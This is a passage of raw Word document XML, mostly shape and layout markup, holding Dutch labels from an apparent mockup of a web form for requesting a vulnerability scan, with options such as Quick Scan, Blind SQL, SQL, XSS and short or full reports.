                          <w:p w14:paraId="53B7C69B" w14:textId="599ED8B0" w:rsidR="002A05E5" w:rsidRPr="008B659F" w:rsidRDefault="002A05E5" w:rsidP="00542A1C">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A56F8" id="Text Box 470" o:spid="_x0000_s1077" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-16.15pt;margin-top:186.3pt;width:205pt;height:153.2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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="603B2513" w14:textId="5C051D7D" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00E85184">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00AC3FAA">
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Aanvraag scan (standaard)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0A660C76" w14:textId="021DB586" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00E85184">
                      <w:r>
                        <w:t xml:space="preserve">Met het standaard aanvraagformulier kunnen gebruikers enkel een soort scan aanvragen met de volgende specificaties: </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="19203743" w14:textId="03F4CC73" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00542A1C">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-Quick Scan</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="60AAF175" w14:textId="18FE0D9E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00542A1C">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-Short Report</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="53B7C69B" w14:textId="599ED8B0" w:rsidR="002A05E5" w:rsidRPr="008B659F" w:rsidRDefault="002A05E5" w:rsidP="00542A1C">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8464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="23EC293A" wp14:editId="00368B61">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4942840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6479540</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1271270" cy="225425"/>
                <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="133" name="Text Box 133"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="12712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B0804" w14:textId="79E9E453" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">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293A" id="Text Box 133" o:spid="_x0000_s1078" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:389.2pt;margin-top:510.2pt;width:100.1pt;height:17.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="480B0804" w14:textId="79E9E453" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">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6416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B646830" wp14:editId="1FF3DB91">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5005892</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6483873</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2663227" cy="5379"/>
                <wp:effectExtent l="0" t="0" r="29210" b="45720"/>
                <wp:wrapNone/>
                <wp:docPr id="575" name="Straight Connector 575"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipH="1" flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="2663227" cy="5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2E7123" id="Straight Connector 575" o:spid="_x0000_s1026" style="position:absolute;flip:x y;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510.55pt" to="603.85pt,5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1296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="75DFBC6E" wp14:editId="54B2CAA8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4940300</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6252845</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1651635" cy="224155"/>
                <wp:effectExtent l="0" t="0" r="0" b="4445"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="570" name="Text Box 570"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1651635"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95B3F" w14:textId="68051AD7" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w: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BC6E" id="Text Box 570" o:spid="_x0000_s1079" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:389pt;margin-top:492.35pt;width:130.05pt;height:17.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="51B95B3F" w14:textId="68051AD7" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Alternatieve e-mailadres</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3104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F3C9B1C" wp14:editId="29E76A82">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5007797</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6253854</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1841500" cy="0"/>
                <wp:effectExtent l="0" t="0" r="12700" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="540" name="Straight Connector 540"/>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449B" id="Straight Connector 540" o:spid="_x0000_s1026" style="position:absolute;flip:x;z-index:252463104;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text" from="394.3pt,492.45pt" to="539.3pt,4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9488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40BC06BE" wp14:editId="18975F66">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4944745</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5915025</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1392555" cy="2286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3925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3EA36" w14:textId="18E11F9F" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Alternatieve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C06BE" id="Text Box 136" o:spid="_x0000_s1080" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:389.35pt;margin-top:465.75pt;width:109.65pt;height:18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y1WHsCAABl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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3723EA36" w14:textId="18E11F9F" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Alternatieve naam</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1056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="51446B7C" wp14:editId="4B93D45D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5007797</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5912298</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1841500" cy="0"/>
                <wp:effectExtent l="0" t="0" r="12700" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="539" name="Straight Connector 539"/>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06AD5" id="Straight Connector 539" o:spid="_x0000_s1026" style="position:absolute;flip:x;z-index:252461056;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text" from="394.3pt,465.55pt" to="539.3pt,46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43648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34CAF283" wp14:editId="0021EC55">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>6844030</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6144895</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="25400" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21600" y="21600"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="514" name="Rectangle 514"/>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F8C1D" id="Rectangle 514" o:spid="_x0000_s1026" style="position:absolute;margin-left:538.9pt;margin-top:483.85pt;width:90pt;height:18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kTxnQ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1600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="62895F49" wp14:editId="02FE5656">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>6844030</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5795645</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="25400" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21600" y="21600"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="513" name="Rectangle 51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D8A00" id="Rectangle 513" o:spid="_x0000_s1026" style="position:absolute;margin-left:538.9pt;margin-top:456.35pt;width:90pt;height:18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7744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F2CDDB1" wp14:editId="271A83FE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>7608570</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6480175</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="381000" cy="114300"/>
                <wp:effectExtent l="0" t="0" r="25400" b="38100"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="24000"/>
                    <wp:lineTo x="21600" y="24000"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="518" name="Rounded Rectangle 518"/>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7261D" id="Rounded Rectangle 518" o:spid="_x0000_s1026" style="position:absolute;margin-left:599.1pt;margin-top:510.25pt;width:30pt;height:9pt;z-index:25244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&#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8224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="45FB1409" wp14:editId="3AE49DA8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2084070</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4994910</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="952500" cy="1259840"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="558" name="Text Box 558"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="9525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295DD" w14:textId="3A8D3D47" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>Scan opties</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2E4224DF" w14:textId="393798DF" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-Full scan</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="543BC038" w14:textId="24F07B6E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-Blind SQL</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="003ABEFC" w14:textId="38BBEB53" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-SQL</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3FA4B2F2" w14:textId="1C3FAA1E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-XSS</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2C71BA31" w14:textId="516E0801" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-Quick Scan</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="30652807" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="64D55890" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">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B1409" id="Text Box 558" o:spid="_x0000_s1081" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:164.1pt;margin-top:393.3pt;width:75pt;height:99.2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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="44B295DD" w14:textId="3A8D3D47" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>Scan opties</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2E4224DF" w14:textId="393798DF" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-Full scan</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="543BC038" w14:textId="24F07B6E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-Blind SQL</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="003ABEFC" w14:textId="38BBEB53" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-SQL</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3FA4B2F2" w14:textId="1C3FAA1E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-XSS</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2C71BA31" w14:textId="516E0801" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-Quick Scan</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="30652807" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="64D55890" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">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0272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6AC154E7" wp14:editId="7D87198F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3230245</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5455920</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1203325" cy="800735"/>
                <wp:effectExtent l="0" t="0" r="0" b="12065"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="562" name="Text Box 562"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1203325"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1C6F6" w14:textId="0E998152" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00BC1E78">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>Rapport opties</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="72AB97F5" w14:textId="0244AB9B" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00BC1E78">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-Full Report</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3BF18F49" w14:textId="1F78169A" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00BC1E78">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>-Short Report</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2D943ECD" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00BC1E78">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54E7" id="Text Box 562" o:spid="_x0000_s1082" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:254.35pt;margin-top:429.6pt;width:94.75pt;height:63.0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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1EC1C6F6" w14:textId="0E998152" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00BC1E78">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>Rapport opties</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="72AB97F5" w14:textId="0244AB9B" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00BC1E78">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-Full Report</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3BF18F49" w14:textId="1F78169A" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00BC1E78">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>-Short Report</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2D943ECD" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00BC1E78">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9008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="75186EED" wp14:editId="3DC72EDA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3225539</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5457937</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3615092" cy="1195"/>
                <wp:effectExtent l="0" t="0" r="17145" b="50165"/>
                <wp:wrapNone/>
                <wp:docPr id="538" name="Straight Connector 538"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipH="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="3615092" cy="1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46DE7" id="Straight Connector 538" o:spid="_x0000_s1026" style="position:absolute;flip:x;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pt,429.75pt" to="538.65pt,4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6960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="24731E20" wp14:editId="1C94E7F4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2153061</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5000812</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4698813" cy="2540"/>
                <wp:effectExtent l="0" t="0" r="26035" b="48260"/>
                <wp:wrapNone/>
                <wp:docPr id="529" name="Straight Connector 529"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipH="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="4698813"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E144C2" id="Straight Connector 529" o:spid="_x0000_s1026" style="position:absolute;flip:x;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5pt,393.75pt" to="539.55pt,39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9552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="256D1A46" wp14:editId="2E4E4330">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>6844030</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5343525</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="25400" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21600" y="21600"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="512" name="Rectangle 51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ADCF2" id="Rectangle 512" o:spid="_x0000_s1026" style="position:absolute;margin-left:538.9pt;margin-top:420.75pt;width:90pt;height:18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oJ3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7504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A0744FF" wp14:editId="27AE42D0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>6851015</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4879340</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1143000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="25400" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21600" y="21600"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="511" name="Rectangle 511"/>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8258A" id="Rectangle 511" o:spid="_x0000_s1026" style="position:absolute;margin-left:539.45pt;margin-top:384.2pt;width:90pt;height:18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1V3M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3052" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="388F182C" wp14:editId="50DD4158">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>6720205</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5683885</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1397000" cy="1021715"/>
                <wp:effectExtent l="0" t="0" r="25400" b="19685"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21479"/>
                    <wp:lineTo x="21600" y="21479"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="515" name="Rectangle 515"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1397000" cy="1021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5443B" id="Rectangle 515" o:spid="_x0000_s1026" style="position:absolute;margin-left:529.15pt;margin-top:447.55pt;width:110pt;height:80.45pt;z-index:2516930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2027" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="71F9E65F" wp14:editId="0A20F855">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>6527800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4659630</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1714500" cy="2171700"/>
                <wp:effectExtent l="0" t="0" r="38100" b="38100"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21726"/>
                    <wp:lineTo x="21760" y="21726"/>
                    <wp:lineTo x="21760"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01D07" id="Rectangle 53" o:spid="_x0000_s1026" style="position:absolute;margin-left:514pt;margin-top:366.9pt;width:135pt;height:171pt;z-index:2516920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77440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="05171F59" wp14:editId="7AF09C54">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4810760</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3629025</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1271905" cy="227965"/>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5EF96" w14:textId="40FB18FA" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">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1F59" id="Text Box 129" o:spid="_x0000_s1083" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:378.8pt;margin-top:285.75pt;width:100.15pt;height:17.9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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3A85EF96" w14:textId="40FB18FA" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">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4368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="303984CE" wp14:editId="10ED2E40">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4882889</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3629772</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2725681" cy="2689"/>
                <wp:effectExtent l="0" t="0" r="17780" b="48260"/>
                <wp:wrapNone/>
                <wp:docPr id="573" name="Straight Connector 573"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipH="1" flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="2725681" cy="2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2EE1B2" id="Straight Connector 573" o:spid="_x0000_s1026" style="position:absolute;flip:x y;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5pt,285.8pt" to="599.1pt,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5456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="37D8AF88" wp14:editId="1E01B20B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>7611110</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3630930</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="381000" cy="114300"/>
                <wp:effectExtent l="0" t="0" r="25400" b="38100"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="24000"/>
                    <wp:lineTo x="21600" y="24000"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
